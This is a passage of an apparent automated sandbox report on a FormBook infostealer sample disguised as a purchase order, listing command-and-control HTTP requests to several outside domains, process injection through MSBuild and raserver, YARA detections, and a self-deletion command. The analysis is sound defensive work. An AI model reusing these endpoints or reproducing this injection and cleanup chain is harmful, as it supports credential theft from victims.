                                                                                Date: Sat, 21 Nov 2020 08:23:55 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 1.0


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                7192.168.2.549753204.188.203.15580C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 21, 2020 09:24:00.619348049 CET5151OUTGET /igqu/?1b3H_Ni=KYQlcl9vZGj8bR01lvQ9gDl5O0hjo7xV5yl6UTMOowrmblKr/7vG5jbVDjpERd28t5Sb&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.guidesgold.net
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:24:00.748373032 CET5151INHTTP/1.1 302 Moved Temporarily
                                                                                Server: nginx
                                                                                Date: Sat, 21 Nov 2020 08:24:00 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 154
                                                                                Connection: close
                                                                                Location: http://www.guidesgold.net?1b3H_Ni=KYQlcl9vZGj8bR01lvQ9gDl5O0hjo7xV5yl6UTMOowrmblKr/7vG5jbVDjpERd28t5Sb&JXhpvv=OXXTgtL8CzU0PRx0
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                8192.168.2.549754198.54.117.21180C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 21, 2020 09:24:11.058880091 CET5154OUTGET /igqu/?1b3H_Ni=UOytMzsBKWezP+Z4jPobAURSNGb1svEAtMI07cL6UgNiZ1/Q1uLpHFW2AnXGybnNRzQX&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.thoughtslate.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                9192.168.2.54975545.194.171.2680C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 21, 2020 09:24:16.826056004 CET5154OUTGET /igqu/?1b3H_Ni=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGkKev0TSo0+&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.chemtradent.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Nov 21, 2020 09:24:17.230567932 CET5155INHTTP/1.1 302 Moved Temporarily
                                                                                Server: nginx
                                                                                Date: Sat, 21 Nov 2020 08:24:17 GMT
                                                                                Content-Type: text/html; charset=gbk
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Location: /404.html
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Code Manipulations

                                                                                Statistics

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                Analysis Process: Purchase Order 40,7045$.exe PID: 6708 Parent PID: 5832

                                                                                General

                                                                                Start time:09:22:33
                                                                                Start date:21/11/2020
                                                                                Path:C:\Users\user\Desktop\Purchase Order 40,7045$.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
                                                                                Imagebase:0x7ffa9b7e0000
                                                                                File size:1269760 bytes
                                                                                MD5 hash:BA4F1B472CB69D8A3924D88DACF1B833
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                Analysis Process: MSBuild.exe PID: 6748 Parent PID: 6708

                                                                                General

                                                                                Start time:09:22:36
                                                                                Start date:21/11/2020
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:{path}
                                                                                Imagebase:0xac0000
                                                                                File size:261728 bytes
                                                                                MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                Reputation:moderate

                                                                                Analysis Process: explorer.exe PID: 3472 Parent PID: 6748

                                                                                General

                                                                                Start time:09:22:38
                                                                                Start date:21/11/2020
                                                                                Path:C:\Windows\explorer.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:
                                                                                Imagebase:0x7ff693d90000
                                                                                File size:3933184 bytes
                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: raserver.exe PID: 7048 Parent PID: 3472

                                                                                General

                                                                                Start time:09:22:47
                                                                                Start date:21/11/2020
                                                                                Path:C:\Windows\SysWOW64\raserver.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                                Imagebase:0xcc0000
                                                                                File size:108544 bytes
                                                                                MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                Reputation:moderate

                                                                                Analysis Process: cmd.exe PID: 6200 Parent PID: 7048

                                                                                General

                                                                                Start time:09:22:51
                                                                                Start date:21/11/2020
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
                                                                                Imagebase:0x150000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: conhost.exe PID: 6268 Parent PID: 6200

                                                                                General

                                                                                Start time:09:22:52
                                                                                Start date:21/11/2020
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7ecfc0000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Disassembly

                                                                                Code Analysis

                                                                                Reset < >